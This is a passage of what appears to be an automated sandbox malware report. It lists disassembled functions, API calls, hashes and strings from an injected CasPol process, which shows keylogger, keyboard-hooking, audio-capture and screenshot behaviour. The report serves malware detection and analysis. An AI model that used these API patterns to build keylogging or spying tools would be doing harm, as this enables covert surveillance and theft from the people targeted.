                                                                                                                  • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                  • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Info
                                                                                                                  • String ID: $h(RA/
                                                                                                                  • API String ID: 1807457897-799253340
                                                                                                                  • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                  • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                  • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                  • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                                                  APIs
                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C18
                                                                                                                    • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C65
                                                                                                                    • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
                                                                                                                    • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                  • String ID: image/jpeg
                                                                                                                  • API String ID: 1291196975-3785015651
                                                                                                                  • Opcode ID: 203489c16dbcee2c70a941053242b98b65a57a30b46d0c0344179c2238acd4ed
                                                                                                                  • Instruction ID: 3c33996df4896106dd3ee16a81609d02114e1f450a3ece369daacccd15328daf
                                                                                                                  • Opcode Fuzzy Hash: 203489c16dbcee2c70a941053242b98b65a57a30b46d0c0344179c2238acd4ed
                                                                                                                  • Instruction Fuzzy Hash: 72315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                                                  APIs
                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509C9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ACP$OCP
                                                                                                                  • API String ID: 0-711371036
                                                                                                                  • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                  • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                                                                                                                  • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                  • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 100098B1
                                                                                                                  • GetLastError.KERNEL32 ref: 100098DA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 442123175-661517699
                                                                                                                  • Opcode ID: 44c02fc31167cef82eb2c7325f1918f2fa4c78e7bb82f98d2e24cadcd22c2269
                                                                                                                  • Instruction ID: 10ae1692938ef1c10bc5cabf9f53a2a3bd6999d6216ca289fae0ab6df1a73c16
                                                                                                                  • Opcode Fuzzy Hash: 44c02fc31167cef82eb2c7325f1918f2fa4c78e7bb82f98d2e24cadcd22c2269
                                                                                                                  • Instruction Fuzzy Hash: 94316171A002199BDB24CF59CC80AD9B3F9FF49350F2185AAE519D7360DB30E985CB50
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 100097C3
                                                                                                                  • GetLastError.KERNEL32 ref: 100097EC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 442123175-661517699
                                                                                                                  • Opcode ID: 2f97b0ea3d2111d9094b6cf8e2123f0946c90a3f737484b600376bf3188e4d44
                                                                                                                  • Instruction ID: 38868272ab1662a5a2ad023a6230b7ecc66e9b3593444bcc3211b27e9ed8cf09
                                                                                                                  • Opcode Fuzzy Hash: 2f97b0ea3d2111d9094b6cf8e2123f0946c90a3f737484b600376bf3188e4d44
                                                                                                                  • Instruction Fuzzy Hash: DC21B136A14219DFEB15CF59C884BDAB3F8EB48381F1044AAE94AD7251D730ED81CB20
                                                                                                                  APIs
                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417D04
                                                                                                                    • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D29
                                                                                                                    • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
                                                                                                                    • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                  • String ID: image/png
                                                                                                                  • API String ID: 1291196975-2966254431
                                                                                                                  • Opcode ID: 08c2138a1cde22915990e47635910406e292a08e99f34f914930cbe525dd8b1a
                                                                                                                  • Instruction ID: 1f40aeda14031b83fd9eea2ddee5e82f5a36372f8d90ac1696f7ac499827f772
                                                                                                                  • Opcode Fuzzy Hash: 08c2138a1cde22915990e47635910406e292a08e99f34f914930cbe525dd8b1a
                                                                                                                  • Instruction Fuzzy Hash: 4621A135204211AFC300AF61CC88CAFBBBDEFCA755F10052EF90693151DB399945CBA6
                                                                                                                  APIs
                                                                                                                  • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                  Strings
                                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LocalTime
                                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                  • API String ID: 481472006-1507639952
                                                                                                                  • Opcode ID: aed4b22af28715f9db634eb419df8fd1999f1e562c63feb9a046f88b8b646f5c
                                                                                                                  • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                                                                                                                  • Opcode Fuzzy Hash: aed4b22af28715f9db634eb419df8fd1999f1e562c63feb9a046f88b8b646f5c
                                                                                                                  • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 10005CA5
                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 2279764990-661517699
                                                                                                                  • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                  • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                  • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                  • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strlen
                                                                                                                  • String ID: : $Se.
                                                                                                                  • API String ID: 4218353326-4089948878
                                                                                                                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                  • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                  • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                  APIs
                                                                                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LocalTime
                                                                                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                  • API String ID: 481472006-2430845779
                                                                                                                  • Opcode ID: dd8d37a997ed350f5b585b7e1a1411d3330e7c11f40c45cf8dce4cd77559f448
                                                                                                                  • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                                                                                                                  • Opcode Fuzzy Hash: dd8d37a997ed350f5b585b7e1a1411d3330e7c11f40c45cf8dce4cd77559f448
                                                                                                                  • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10002B4F
                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 10002C36
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 3761405300-661517699
                                                                                                                  • Opcode ID: 70e6b92d4ff8390b97530531c8a31b2bf75f1acffc31a4c733281a71a18183d0
                                                                                                                  • Instruction ID: 3e738cf41e4fedca429440b27c5ceba6e76d410b83429fe86edfa1b27721cda5
                                                                                                                  • Opcode Fuzzy Hash: 70e6b92d4ff8390b97530531c8a31b2bf75f1acffc31a4c733281a71a18183d0
                                                                                                                  • Instruction Fuzzy Hash: 2F21BEB8512361AAF714CF15DED1B44BBE4FB48764F10C02AE9089A3A0E7B0D581CF55
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                  • String ID: Online Keylogger Stopped
                                                                                                                  • API String ID: 1623830855-1496645233
                                                                                                                  • Opcode ID: fedb9acac80da4baee9d3d26bf8b07834ee1ff9dec99e7e583def64b732056b5
                                                                                                                  • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                                                                                                                  • Opcode Fuzzy Hash: fedb9acac80da4baee9d3d26bf8b07834ee1ff9dec99e7e583def64b732056b5
                                                                                                                  • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                                                                                                                  APIs
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                    • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                  • String ID: Unknown exception
                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                  • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                  • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                  • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                  • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                  APIs
                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String
                                                                                                                  • String ID: LCMapStringEx$h(RA/
                                                                                                                  • API String ID: 2568140703-254023721
                                                                                                                  • Opcode ID: 7a47d43865ba002eab841ac63f0264426d0741ac74f7406fba362a09800a18bf
                                                                                                                  • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                  • Opcode Fuzzy Hash: 7a47d43865ba002eab841ac63f0264426d0741ac74f7406fba362a09800a18bf
                                                                                                                  • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                                                  APIs
                                                                                                                  • waveInPrepareHeader.WINMM(00F45390,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                  • waveInAddBuffer.WINMM(00F45390,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wave$BufferHeaderPrepare
                                                                                                                  • String ID: T=G
                                                                                                                  • API String ID: 2315374483-379896819
                                                                                                                  • Opcode ID: b5a1dd24f47cf6807038c428b2f4b185eaaf619d090bdcfa74a6be548d705e4e
                                                                                                                  • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                  • Opcode Fuzzy Hash: b5a1dd24f47cf6807038c428b2f4b185eaaf619d090bdcfa74a6be548d705e4e
                                                                                                                  • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                  APIs
                                                                                                                  • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LocaleValid
                                                                                                                  • String ID: IsValidLocaleName$z=D
                                                                                                                  • API String ID: 1901932003-2791046955
                                                                                                                  • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                  • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                                                                                                  • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                  • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: H_prolog
                                                                                                                  • String ID: T=G$T=G
                                                                                                                  • API String ID: 3519838083-3732185208
                                                                                                                  • Opcode ID: 982f7bd813af9d9c889e4a2d4ec4ec1ff60f17d6450c8448ea392ea3d49e0b1a
                                                                                                                  • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                                                                                                                  • Opcode Fuzzy Hash: 982f7bd813af9d9c889e4a2d4ec4ec1ff60f17d6450c8448ea392ea3d49e0b1a
                                                                                                                  • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                                                                                                                  APIs
                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 10005F02
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                                                  • String ID: InitializeCriticalSectionEx$h(RA/
                                                                                                                  • API String ID: 2593887523-3530035965
                                                                                                                  • Opcode ID: 239e2963de0d6cd0752a7905e87955d260eca2173f5729cc2670a532fb8154a9
                                                                                                                  • Instruction ID: 674605c196627833912876511d98c7499c33f247a669ee446c9f59910835c79f
                                                                                                                  • Opcode Fuzzy Hash: 239e2963de0d6cd0752a7905e87955d260eca2173f5729cc2670a532fb8154a9
                                                                                                                  • Instruction Fuzzy Hash: B0F0B43154011CBBFB159F50CC00DEE7F61DB183D1B108025FD0966164CF32AD10AAA4
                                                                                                                  APIs
                                                                                                                  • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                    • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                    • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                    • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                    • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                    • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                    • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                    • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                  • String ID: [AltL]$[AltR]
                                                                                                                  • API String ID: 2738857842-2658077756
                                                                                                                  • Opcode ID: 4e5e1223f7f845a1eab5c2f051b9cc675264121dd46054d4836379e51054800e
                                                                                                                  • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                  • Opcode Fuzzy Hash: 4e5e1223f7f845a1eab5c2f051b9cc675264121dd46054d4836379e51054800e
                                                                                                                  • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
